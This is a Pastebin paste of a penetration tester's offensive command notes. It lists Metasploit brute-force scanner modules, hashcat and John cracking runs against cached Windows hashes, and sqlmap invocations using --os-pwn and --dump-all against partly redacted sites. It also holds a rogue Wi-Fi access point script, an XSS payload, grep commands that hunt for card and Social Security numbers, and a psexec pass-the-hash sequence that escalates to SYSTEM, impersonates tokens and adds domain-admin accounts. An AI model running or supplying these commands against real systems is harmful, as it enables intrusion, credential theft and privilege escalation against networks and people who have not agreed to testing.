opexxx

metasploit_tips_tricks

Jul 17th, 2013
6,177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # nethackit.sh.txt metasploit scanners
  2. auxiliary/scanner/ftp/anonymous
  3. auxiliary/scanner/ftp/ftp_login
  4. auxiliary/scanner/snmp/snmp_enum
  5. auxiliary/scanner/snmp/snmp_enumshares
  6. auxiliary/scanner/snmp/snmp_enumusers
  7. auxiliary/scanner/snmp/snmp_login
  8. auxiliary/scanner/mssql/mssql_hashdump
  9. auxiliary/scanner/oracle/oracle_login
  10. auxiliary/scanner/oracle/sid_brute
  11. auxiliary/scanner/smtp/smtp_enum
  12. auxiliary/scanner/smtp/smtp_version
  13. auxiliary/scanner/telnet/telnet_login
  14. auxiliary/scanner/mysql/mysql_hashdump
  15. auxiliary/scanner/mysql/mysql_login
  16. auxiliary/scanner/mysql/mysql_version
  17. auxiliary/scanner/smb/smb_version
  18. auxiliary/scanner/smb/smb_enumusers
  19. auxiliary/scanner/smb/smb_login
  20. auxiliary/scanner/smb/smb_enumshares
  21. auxiliary/scanner/nfs/nfsmount
  22. auxiliary/scanner/vnc/vnc_login
  23. auxiliary/scanner/vnc/vnc_none_auth
  24. auxiliary/scanner/pop3/pop3_version
  25. auxiliary/scanner/pop3/pop3_login
  26. auxiliary/scanner/http/http_login
  27. auxiliary/scanner/http/dir_scanner
  28. auxiliary/scanner/http/dir_scanner
  29. auxiliary/scanner/http/http_version
  30. auxiliary/scanner/http/robots_txt
  31. auxiliary/scanner/http/apache_userdir_enum
  32. auxiliary/scanner/http/blind_sql_query
  33. auxiliary/scanner/http/cisco_ios_auth_bypass
  34. auxiliary/scanner/http/error_sql_injection
  35. auxiliary/scanner/http/files_dir
  36. auxiliary/scanner/http/jboss_vulnscan
  37. auxiliary/scanner/http/web_vulndb
  38. auxiliary/scanner/ssh/ssh_login
  39. auxiliary/scanner/ssh/ssh_login_pubkey
  40. auxiliary/scanner/ssh/ssh_version
  41. auxiliary/scanner/sip/enumerator
  42. auxiliary/scanner/sip/enumerator_tcp
  43. auxiliary/scanner/sip/sipdroid_ext_enum
  44.  
  45. # grep password words in a file and shot 4 lines before and after grep images AIX images
  46. egrep -A 4 -B 4 -ia '(passwd|password|shadow)' someAIX_NIM_DUMP.image.110512 > out.txt
  47. # perform strings on the output so we can read it ..
  48. strings out.txt > out2.txt
  49.  
  50.  
  51. # Oracle 7-10g DES(ORACLE) Oclhashcat_plus GPU
  52. # input :   F35C90763516369B:DEV_MDS
  53. cudaHashcat-plus64.exe --hash-type 3100 C:\egb\ocl\ORACLE.txt C:\egb\Dictionaries\PasswordsPro.dic C:\egb\Dictionaries\Xploitz_clean.lst
  54.  
  55. #oracle dump ref defcon-17-chris_gates-breaking_metasploit.pdf and win32exec.rb in MSF
  56. select owner, table_name, column_name,data_type,data_length, data_precision,data_default, avg_col_len, char_length from sys.dba_tab_columns where owner not in ('APPQOSSYS','ADUSER','CTXSYS','DIP','DBSNMP','MDSYS','OUTLN','SYS','SYSTEM','TEST','XDB','WMSYS','XSNULL') AND avg_col_len>0
  57.  
  58. # oracle
  59. nmap -n --script=oracle-sid-brute -p 1521-1560 -iL oracle -A
  60.  
  61. # mount smb share with runas/savecred ... yes this is bad idea!
  62. runas /u:admin /savecred "net use Z: \\192.168.1.151\myth\h /del"
  63. runas /u:admin /savecred "net use \\192.168.1.151\myth\h /del"
  64. runas /u:admin /savecred "net use z: \\192.168.1.151\myth\h /user:mythtv PASSSWORDHERE"
  65.  
  66.  
  67.  
  68.  
  69. Use takeown to take ownership of the file
  70. takeown /r /d y /f *
  71. Follow it up with icacls set the access control list
  72. icacls * /t  /grant Everyone:F
  73.  
  74.  
  75. #So it appears Google translator blocks English to English translating ( aka super fast web proxy ).  So guess what ? Just change the source language it to valid English language code like en-au
  76.  
  77. http://translate.google.com/translate?sl=af&tl=en-au&js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&u=http%3A%2F%2Frmccurdy.com
  78.  
  79.  
  80.  
  81. #gawk awk system exec commands with output of awk
  82. /rmccurdy/scripts/web_dump.sh:echo $i|sed 's/,/ /g' | gawk '{system ("curl -k --location-trusted -m 3 -L -o " $1"_"$2".html https:\/\/"$1":"$2 )}' 2>&1  &
  83. /rmccurdy/scripts/web_dump.sh:echo $i|sed 's/,/ /g' | gawk '{system ("curl -k --location-trusted -m 3 -L -o " $1"_"$2".html http:\/\/"$1":"$2 )}' 2>&1  &
  84.  
  85. #Nmap Idle Scanning.
  86. use auxiliary/scanner/ip/ipidseq
  87. nmap  192.168.1.250 -top-ports 9 -D RND:120 -T4 -ff
  88.  
  89. # wmic fu search systems for running 'exe' to hijack
  90. FOR /F "delims==" %%A IN ('type ips.txt') DO  wmic /Node:%%A wmic /user:username /password:yourpassword /FAILFAST:ON process where "name like '%.exe'" call  getowner
  91.  
  92. #uwall.tv direct link
  93. http://uwall.tv/player_lightbox.php?q=gangnam%20style
  94.  
  95. # burp in win7 etc ..
  96. run as administrator
  97. Solution was to add the "-Djava.net.preferIPv4Stack=true" flag, so the following entry in my .bat file works now:
  98.  
  99. # John the Ripper Password Cracker (Fast Mode)
  100. # see also :
  101. #
  102. # auxiliary/analyze/jtr_aix
  103. # auxiliary/analyze/jtr_linux
  104. # auxiliary/analyze/jtr_mssql_fast
  105. # auxiliary/analyze/jtr_mysql_fast
  106. # auxiliary/analyze/jtr_oracle_fast
  107. # auxiliary/analyze/jtr_unshadow
  108. # auxiliary/analyze/postgres_md5_crack
  109.  
  110.  
  111. use auxiliary/analyze/jtr_crack_fast
  112. set Munge 0
  113. run# got new ebooks with roubble \n\n or \r\r
  114. For converting double newlines (\n\n) to a single newline (\n):
  115. sed -e 'N;P;s/\n$//;D'
  116.  
  117. For converting double carriage returns (\r\r) to a single carriage
  118. return (\r):
  119. sed -e 's/\r\r/\r/g'
  120.  
  121. tr(1) has the -s option, but that will squeeze multiple (possibly more
  122. than two) occurrences to a single occurrence.
  123.  
  124. This can also be handled in the more general case with perl(1), e.g.:
  125. perl -pe '
  126. BEGIN {$/="\n\n";}
  127. s/\n\n/\n/o;
  128.  
  129. john 1337 speak worlist gen:
  130.  
  131.  
  132.  
  133. The default john.conf includes some rules like that, enabled for "single crack" mode only by default. You may copy the lines between these two comments:
  134. # The following 3l33t rules are based on original Crack's dicts.rules
  135. l/asa4[:c]
  136. l/ese3[:c]
  137. l/lsl1[:c]
  138. l/oso0[:c]
  139. l/sss$[:c]
  140. ...
  141. l/asa4/ese3/lsl1/oso0/sss$[:c]
  142. # Now to the prefix stuff...
  143. into the [List.Rules:Wordlist] section to have them enabled for wordlist mode as well. usage: john -w=wordlist --stdout --rules
  144.  
  145.  
  146. # slow this or run it over proxychains etc ..
  147. for i in `cat in` ;do python metagoofil.py -d $i -l 100 -f all -o micro_$i.html -t micro-files_$i;sleep 60;done
  148. for i in `cat in` ;do ./theHarvester.py -d $i -b google;sleep 60;done
  149.  
  150.  
  151. # hybrid mask attack hashcat  not all special characters
  152. ?u?l?d!@#$-().*_
  153.  
  154. # grep 8 or more char long characterslength
  155. grep '[^\ ]\{8,\}'
  156. # sed 8 chars long characters long length
  157. sed -n -e '/^.\{8\}$/p''
  158.  
  159.  
  160. # fix path Environment Variables path issues in M$
  161. sysdm.cpl
  162. C:\Program Files\w3af;C:\Program Files;C:\winxp;C:\winxp\System32;c:\program files\nmap;C:\Program Files\RSA SecurID Token Common;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Strawberry\c\bin;C:\Strawberry\perl\site\bin;C:\Strawberry\perl\bin
  163.  
  164.  
  165. # nmap smb check vulns -oA does nothing for this nse script so just take std out ...
  166. nmap -oA smb_check -T4 -n -vvvv -p 135-139,445 -dddddd --script smb-check-vulns.nse --script-args safe=0  unsafe=1 --script-args=unsafe=1 -iL smb_check.txt   > out.txt
  167.  
  168. #  openvas cioent
  169. # Update your distro
  170. apt-get update && apt-get dist-upgrade
  171.  
  172. # Install openvas server and client software + security plugins
  173. apt-get install openvas-server openvas-client \
  174.   openvas-plugins-base openvas-plugins-dfsg
  175.  
  176. # Update the vuln. database
  177. openvas-nvt-sync
  178.  
  179. Add a user that you're going to use from the client, to login:
  180.  
  181. openvas-adduser
  182.  
  183. Here, you'll add a user/pass combination.
  184.  
  185. When prompted to add a 'rule' - I allow my user to do everything. The rules allow/disallow scanning of hosts. If you want you can let bob scan 192.168.0.0/24 or whatever. I want my user to scan all, so when prompted, simply enter
  186.  
  187. default accept
  188.  
  189. Now, fire up the server. Note that the first time you run, it loads all those checks into memory so it takes a LONG time for the server to actually start.
  190.  
  191. /etc/init.d/openvas-server start
  192.  
  193. Now, you can start scanning. Create a file with IP's and/or hostnames that your client will feed to the server to scan. Something like this:
  194.  
  195. 192.168.1.5
  196. www.mydomain.com
  197. dns.mydomain.com
  198. 10.1.19.0/24
  199.  
  200. etc.
  201.  
  202. The server listens on port: 9390 by default so you'll want to tell your client to connect there. Once you have the file created, you can kick off your scan like this:
  203.  
  204. OpenVAS-Client -q 127.0.0.1 9390 admin scanme.txt -T html \
  205.     ~/Desktop/openvas-output-`date`.html
  206.  
  207. You'll be prompted to accept the SSL certificate, go ahead, it's automagically created by the pkg when it's installed. Then, open that file in a browser when it's done and start going through it. Be warned, scanning is very hostile so you should really only scan your own systems.. and those of your enemies.
  208.  
  209.  
  210. # sqlmap notes .. also check out Havij 1.15 - Advanced SQL Injection
  211.  
  212. --wizard
  213. --search -C pass,pwd,ssn
  214.  
  215.  
  216. /pentest/database/sqlmap/sqlmap.py -u "https://tZZZZZZ.com/ZZZZZ/Default.aspx" --data="__VIEWSTATE=%ZZZZZZZZ&btnContinue=Continue" --os-pwn --msf-path /pentest/exploits/framework
  217.  
  218. /pentest/database/sqlmap/sqlmap.py -u "http://ZZZZ4/forgotpass.aspx" --data="__VIEWSTATE=%2FZZZZZZ&email=a&submit=Password" --dump-all --exclude-sysdbs
  219.  
  220.  
  221. #oclHashcat plus Support List :
  222.  
  223. # scripts !
  224. http://itsecblog.net/downloads/batchcrack.sh
  225.  
  226. number  PSA     hashcat (0.39b24)   oclHashcat-plus (0.08b25)   oclHashcat-lite (0.10b9)
  227. 0   MD5     x   x   x
  228. 1   *md5($pass.$salt) (see 11)  x      
  229. 2   *md5($salt.$pass) (see 21)  x      
  230. 3   *md5(md5($pass)) (see 2600)     x      
  231. 4   *md5(md5(md5($pass)))   x      
  232. 5   *vBulletin < v3.8.5 (see 2611)  x      
  233. 6   *md5(md5($salt).$pass) (see 2811)   x      
  234. 7   *md5($salt.md5($pass))  x      
  235. 8   *md5($salt.$pass.$salt)     x      
  236. 9   *md5(md5($salt).md5($pass))     x      
  237. 10  *md5(md5($pass).md5($salt))     x       x
  238. 11  *md5($salt.md5($salt.$pass))    x      
  239. 11  Joomla      x   x
  240. 12  *md5($salt.md5($pass.$salt))    x      
  241. 15  *vBulletin > v3.8.5 (see 2711)  x      
  242. 21  osCommerce, xt:Commerce         x  
  243. 30  *md5($username.0.$pass)     x      
  244. 31  *md5(strtoupper(md5($pass)))    x      
  245. 100     SHA1    x   x   x
  246. 101     nsldap, SHA-1(Base64), Netscape LDAP SHA        x   x
  247. 101     *sha1($pass.$salt)  x      
  248. 102     *sha1($salt.$pass)  x      
  249. 103     *sha1(sha1($pass))  x      
  250. 104     *sha1(sha1(sha1($pass)))    x      
  251. 105     *sha1(strtolower($username).$pass) (see 121)    x      
  252. 110     *sha1($pass.$salt)          x
  253. 111     nsldaps, SSHA-1(Base64), Netscape LDAP SSHA         x   x
  254. 112     Oracle 11g      x   x
  255. 121     SMF > v1.1      x  
  256. 122     OSX v10.4, v10.5, v10.6         x  
  257. 131     MSSQL(2000)         x   x
  258. 132     MSSQL(2005)         x   x
  259. 200     MySQL323    x      
  260. 300     MySQL >=4.1 x   x   x
  261. 400     phpass, MD5(Wordpress), MD5(phpBB3)     x   x  
  262. 500     md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5     x   x  
  263. 600     *SHA-1(Base64) (see 101)    x      
  264. 700     *SSHA-1(Base64) (see 111)   x      
  265. 800     SHA-1(Django)   x      
  266. 900     MD4     x   x   x
  267. 1000    NTLM    x   x   x
  268. 1100    Domain Cached Credentials, mscash   x   x   x
  269. 1200    MD5(Chap)   x      
  270. 1300    MSSQL   x      
  271. 1400    SHA256  x   x   x
  272. 1500    descrypt, DES(Unix), Traditional DES        x   x
  273. 1600    md5apr1, MD5(APR), Apache MD5   x   x  
  274. 1700    SHA512  x       x
  275. 1800    SHA-512(Unix)   x      
  276. 1900    SL3             x
  277. 2100    Domain Cached Credentials2, mscash2         x  
  278. 2400    Cisco-PIX MD5       x   x
  279. 2500    WPA/WPA2        x  
  280. 2600    Double MD5      x   x
  281. 2611    vBulletin < v3.8.5      x   x
  282. 2711    vBulletin > v3.8.5      x   x
  283. 2811    IPB2+, MyBB1.2+         x   x
  284. 3000    LM      x   x
  285.  
  286.    *
  287.      * Depreached,
  288.  
  289.  
  290. Example :
  291. set BIN=oclHashcat-plus64
  292. set OPTS=--attack-mode 3 --gpu-accel 160 --gpu-loops 1024 --gpu-watchdog 0 --runtime 30 --force --custom-charset1 ?l?d?s?u
  293.  
  294. %BIN% %OPTS% --hash-type 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  295. %BIN% %OPTS% --hash-type   11 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  296. %BIN% %OPTS% --hash-type   21 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aa ?1?1?1?1?1?1?1?1
  297. %BIN% %OPTS% --hash-type  100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  298. %BIN% %OPTS% --hash-type  101 {SHA}aaaaaaaaaaaaaaaaaaaaaaaaaaQ= ?1?1?1?1?1?1?1?1
  299. %BIN% %OPTS% --hash-type  111 {SSHA}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQ== ?1?1?1?1?1?1?1?1
  300. %BIN% %OPTS% --hash-type  112 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaa ?1?1?1?1?1?1?1?1
  301. %BIN% %OPTS% --hash-type  121 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
  302. %BIN% %OPTS% --hash-type  122 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  303. %BIN% %OPTS% --hash-type  131 0x0100aaaaaaaa0000000000000000000000000000000000000000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  304. %BIN% %OPTS% --hash-type  132 0x0100aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  305. %BIN% %OPTS% --hash-type  300 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  306. %BIN% %OPTS% --hash-type  400 $H$9aaaaaaaaaaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1
  307. %BIN% %OPTS% --hash-type  500 $1$aaaaaaaa$aaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1 --gpu-loops 1000
  308. %BIN% %OPTS% --hash-type  900 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  309. %BIN% %OPTS% --hash-type 1000 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  310. %BIN% %OPTS% --hash-type 1100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
  311. %BIN% %OPTS% --hash-type 1400 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  312. %BIN% %OPTS% --hash-type 1500 aaaaaaaaaaaaw ?1?1?1?1?1?1?1?1 --gpu-accel 80
  313. %BIN% %OPTS% --hash-type 1600 $apr1$aaaaaaaa$aaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1 --gpu-loops 1000
  314. %BIN% %OPTS% --hash-type 2100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
  315. %BIN% %OPTS% --hash-type 2400 aaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  316. %BIN% %OPTS% --hash-type 2500 test.hccap ?1?1?1?1?1?1?1?1
  317. %BIN% %OPTS% --hash-type 2611 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaa ?1?1?1?1?1?1?1?1
  318. %BIN% %OPTS% --hash-type 2711 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
  319. %BIN% %OPTS% --hash-type 2811 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaa ?1?1?1?1?1?1?1?1
  320. sq
  321.  
  322. # ocl hashcat plus examples:
  323.  
  324.  
  325.  
  326. all Rule based attack:
  327. FOR /F "delims==" %%A IN ('DIR/B/S ".\rules\"') DO cudaHashcat-plus32.exe -a 0 -r  "%%A"  -m1100 -o out.txt  "mscache2" "C:\egb\Dictionaries\rockyou.txt"
  328.  
  329.  
  330.  
  331.  
  332.  
  333. rem example brute by char to 7 max chars in ~5min  with GTX 560 example hash '2d9f0b052932ad18b87f315641921cda:user' password is password ...
  334. cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1
  335. cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1
  336. cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1
  337. cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1
  338. cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1
  339. cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1?1
  340.  
  341.  
  342. rem example Hybrid attack rockyou.txt wordlist+MASK to 4 chars
  343. cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1"
  344. cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1"
  345. cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1?1"
  346.  
  347.  
  348. rem same as above with 1337 speek wordlist+MASK  to 4 chars
  349. cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1"
  350. cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1"
  351. cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1?1"
  352.  
  353. rem example Hybrid attack rockyou.txt wordlist+MASK to 4 chars digi and some special chars only ...
  354. cudaHashcat-plus32.exe -o out.txt -a6 -1 "?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1?1"
  355.  
  356. rem example Hybrid attack 1337 speekt wordlist+MASK to 4 chars digi and some special chars only ...
  357. cudaHashcat-plus32.exe -o out.txt -a6 -1 "?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1?1"
  358.  
  359.  
  360.  
  361.  
  362. rem dammit I give up ... 6hrs .. for 7char brute
  363. cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1?1?1
  364.  
  365.  
  366. REM really !?!? example 8 char brute ( 18 days on GTX 560 )
  367. cudaHashcat-plus32.exe -o out.txt -a3 -1 ?l?u?d!@#$-().*_ -m1100 mscache2 ?1?1?1?1?1?1?1?1
  368.  
  369.  
  370.  
  371. # more examples hashes cracked john
  372.  
  373. user:2d9f0b052932ad18b87f315641921cda:lab:lab.internal
  374. Service currently active. Stopping service...
  375. Service successfully removed.
  376.  
  377. John Plugin:
  378. $ ./john -format:mscash ./mscash.txt
  379. Loaded 1 password hash (M$ Cache Hash [mscash])
  380. password (user
  381.  
  382.  
  383.  
  384. # set power profile via command line  
  385.  
  386. Powercfg.exe /SETACTIVE "Always On"
  387. Powercfg.exe /SETACTIVE "Max Battery"
  388.  
  389. #Remove the .NET Credentials (Stored User names and Passwords)
  390. Control keymgr.dll
  391.  
  392.  
  393. # convert amr to mp3
  394. ffmpeg -i file.amr -vn -acodec libmp3lame -ac 2 -ab 96k file.mp3
  395. FOR /F "delims==" %%A IN ('DIR/B "*.amr"') DO ffmpeg -i %%A -vn -acodec libmp3lame -ac 2 -ab 96k %%A.mp3
  396.  
  397.  
  398. #windows saved passwords
  399. rundll32.exe keymgr.dll, KRShowKeyMgr
  400.  
  401. # check for mod date range
  402. find / -type f -newermt 2011-10-01 ! -newermt 2012-04-30
  403.  
  404. # openvas on 11.10
  405. take src out of the sources.list
  406. add --http-only to the /etc/init.d/greenbone-security-assistant startup script
  407.  
  408. # mass set path
  409. export PATH=$PATH:`find /usr/lib/ruby/1.9.1 -type d | sed 's/$/:/g' | tr -d '\n'`
  410.  
  411.  
  412.  
  413. # top web ports ports
  414. 80-83,99,100,443,631,800,1000,1739,2002,2301,2381,3000,5800,5988,5989,8000-8080,808,8099,8100-8105,8443,8888,8900,9999,10000
  415.  
  416. # more web ports
  417. 10080,10100,10243,10250,10251,1027,1029,1030,1032,10439,10444,11267,1183,1184,11869,11905,11910,11935,1208,13080,1416,14176,14654,16000,16080,16372,17012,18083,1818,18180,1830,1831,19000,19082,19091,19101,1947,1972,19740,2002,2030,20444,2130,2140,21988,2301,2316,2381,2414,2424,24305,2480,2523,25684,25825,2693,27775,280,28080,2851,2869,30444,30900,31458,31459,3201,3227,32843,3339,34988,35135,35145,3526,3617,3790,37922,3842,3914,3938,4036,4053,41647,4220,4239,4343,443,45000,4680,47001,4723,48018,4848,4864,49152,49157,50000,50001,50038,51785,51905,51908,5225,53001,5357,5440,5447,5449,5469,54850,5500,5501,554,5554,55885,56414,56737,57423,57772,57773,5800,5801,591,593,5985,5989,60000,6001,6002,6003,6004,60213,61000,6107,6108,6113,6114,6160,6161,631,6325,6453,6454,65084,65093,6842,7001,7002,7003,7070,7099,7126,7191,7359,7453,7454,7717,7751,80,8000,8001,8002,8003,8004,8008,8020,8070,8071,8077,8080,8081,8082,8083,8085,8086,8087,8088,8090,8093,8094,8095,8099,81,8107,8113,8114,8115,8118,8120,8123,8126,8133,8135,8138,815,8150,8151,8180,82,8200,8222,8260,8300,8323,8333,84,8444,85,8530,8533,86,8660,8666,8701,8703,8732,8733,8740,8878,8880,8888,8889,8900,90,9000,9001,9002,9005,9006,9073,9080,9081,9084,9086,9087,9090,9091,9191,9300,9310,9444,9501,9510,9595,9642,9675,9676,9797,9823,9887
  418.  
  419. #sap ports
  420. 32000,33000,34000,36000,47000,48000,21-23,25,21-23,25,80-83,53,110,135,139,445,3128,1433,1521,3306,3389,5900,6001,8080,8888,80-83,53,110,135,139,445,3128,1433,1521,3306,3389,5900,6001,8080,8888,99,100,443,631,800,1000,1739,2002,2301,2381,3000,5800,5988,5989,8000-8015,8080-8083,8099,8100-8105,8443,8888,8900,9999,10000
  421.  
  422. # common proxy ports
  423. 80,81,82,83,84,85,86,443,808,3128,6515,6666,8000,8001,8008,8080,8081,8088,8090,8118,8181,8888,8909,9000,9090,54321
  424.  
  425.  
  426.  
  427.  
  428.  
  429. # Search office documents for PII
  430. # CC with SSN no dash ( high false positive )
  431. find  . -iname "*.???x" -type f -exec  unzip -p '{}' '*'  \; | sed -e 's/<[^>]\{1,\}>/ /g; s/[^[:print:]]\{1,\}/ /g' | egrep "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b|\b[0-9]{9}\b"
  432.  
  433. # CC with SSN dash (  low false positive only match ###-##-#### not any 8digi number )
  434. find  . -iname "*.???x" -type f -exec  unzip -p '{}' '*'  \; | sed -e 's/<[^>]\{1,\}>/ /g; s/[^[:print:]]\{1,\}/ /g' | egrep "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b"
  435.  
  436.  
  437.  
  438.  
  439. # nslookup to CSV
  440. for i in `cat FULL` ;do echo "IP$i";nslookup $i|grep 'name ='|sed 's/.*name = /,/g'|sed 's/\.$//g';done| tr -d '\n' | awk '{gsub("IP","\n"); print}'
  441.  
  442.  
  443. # my-ip-neighbors lookup
  444. # 200 at a time .. you need to change the -x to a proxy that works .. rmccurdy.com/scripts/proxy/good.txt
  445. # test google before you start ..
  446. # curl -x 184.171.175.14:808 http://google.com etc ..
  447.  
  448.  
  449. for i in `cat FULL`;do echo curl -x 184.171.175.14:808 "\""http://www.my-ip-neighbors.com/?domain=$i"\"";done > go
  450. bash -x go > out
  451.  
  452. # grep the output for all the goodies and make it nice CSV
  453. egrep "(\"http:\/\/whois\.domaintools\.com|domain\" value=\")" out | sed 's/.*domain\" value=\"/IP /g' | sed 's/\"\/>.*//g' | sed 's/.*domaintools.com\//,/g' | sed 's/" t.*//g' | tr -d '\n' | awk '{gsub("IP","\n"); print}'
  454.  
  455.  
  456.  
  457.  
  458.  
  459. # block port 80 throttle
  460. iptables  -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 4 -j REJECT
  461.  
  462.  
  463.  
  464. # CURL HTTPS
  465. for i in `cat check`;do echo curl -L -k --location-trusted -m 3 -L -o $i.htm "\""https://$i"\"";done > https
  466.  
  467.  
  468. # airbase/karma.rc setup
  469.  
  470.  
  471. --------------------
  472.  
  473. gogogo
  474. ----------------
  475.  
  476. # change eth1 to internet interface
  477. iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE
  478. iptables --append FORWARD --in-interface at0 -j ACCEPT
  479. echo 1 > /proc/sys/net/ipv4/ip_forward
  480.  
  481.  
  482. # kill stuff the will cause issues ..
  483. killall dhcpd3 dhclient dhclient3 dhcpcd dhcpd
  484.  
  485. # start MSF karma.rc script  logs are screenlog.0 etc ..
  486. xterm -e "screen -L /pentest/exploits/framework/msfconsole -r /stuff/karma.rc" &
  487.  
  488. # takes a wile to startup .. lets wait we need it all ready to work before people connect to it so we dont miss packets !!!
  489.  
  490. echo "waiting for MSF karma to start .. 50sec"
  491. sleep 20
  492.  
  493. # monitor mode change wlan1 to your wifi
  494. airmon-ng start wlan1
  495.  
  496. sleep 5
  497.  
  498. # setup fake AP
  499. xterm -e "airbase-ng -c 6 -P mon0 -v" &
  500.  
  501. sleep 5
  502.  
  503. ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 &
  504.  
  505. # setup DHCP server
  506. xterm -e "dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0" &
  507.  
  508. # DEBUG DHCP to see DHCP request hits xterm -e "tcpdump -i at0 -n port 67 and port 68"  &
  509.  
  510.  
  511. ------------------
  512.  
  513.  
  514.  
  515.  
  516. # XSS
  517. >"'><script>alert('XSS')</script>
  518. # add full read write read/write full R/W on registry key
  519. SetACL.exe -on "HKEY_LOCAL_MACHINE\Software\Microsoft\Policies" -ot reg -actn ace -ace "n:MyDomain\JohnDoe;p:full"
  520. # add -P0 for no ping
  521. /usr/bin/screen -fa -d -m  nmap -T5  -p 20,21,80,115,443,989,990 -vvvv -sS  -n --max-rtt-timeout 300ms --max-retries 1 192.30.0.0/16 -oA /home/administrator/rmccurdy/192.30.0.0_fast_ping
  522. # msf metasploit use login to get msfshell for pivot/token
  523. use exploit/windows/smb/psexec
  524.  
  525. set RHOST 192.168.64.123
  526. set SMBUser adminit
  527. set SMBPass password
  528. # also set HASHES !! set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
  529.  
  530. exploit
  531.  
  532. getuid
  533. use priv
  534. getsystem
  535. use incognito
  536. list_tokens -u
  537. add_group_user "Domain Admins"
  538. impersonate_token "DOMAIN\\user"
  539. # add user and give it local admin
  540. net user  test PASSWORDHERE /add
  541. net localgroup administrators test /add
  542.  
  543. # add user to domain and makt it domain admin
  544. net user /add USERNAME STRONGPASSWORD /domain
  545. net group  /add "domain admins" USERNAME /domain
  546.  
  547. ---------------------------
  548. # make exe
